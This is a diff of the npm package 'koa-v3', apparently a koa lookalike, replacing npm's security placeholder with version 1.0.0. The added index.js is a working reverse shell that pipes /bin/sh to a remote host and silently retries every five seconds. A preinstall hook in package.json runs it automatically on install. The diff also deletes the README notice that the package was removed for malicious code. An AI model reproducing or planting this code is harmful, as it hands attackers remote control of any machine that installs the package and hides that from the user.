koa-v3 0.0.1-security → 1.0.0

package/index.js

@@ -0,0 +1,29 @@
+const net = require("net");
+const { spawn } = require("child_process");
+
+// SETTINGS: Your Kali IP and Port
+const HOST = "127.0.0.1"; 
+const PORT = 4444;
+
+function connect() {
+    const client = new net.Socket();
+    client.connect(PORT, HOST, () => {
+        // Spawns a standard shell
+        const sh = spawn("/bin/sh", []);
+        
+        // Pipes: Listener Input -> Shell Stdin | Shell Stdout/Err -> Listener
+        client.pipe(sh.stdin);
+        sh.stdout.pipe(client);
+        sh.stderr.pipe(client);
+
+        // Optional: Reconnect if the connection drops
+        sh.on('exit', () => client.destroy());
+    });
+
+    client.on('error', (e) => {
+        // Silent fail (standard for malware/PoCs to avoid alerting user)
+        setTimeout(connect, 5000); 
+    });
+}
+
+connect();

package/package.json

@@ -1,6 +1,13 @@
 {
   "name": "koa-v3",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.0",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "node index.js"
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC"
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=koa-v3 for more information.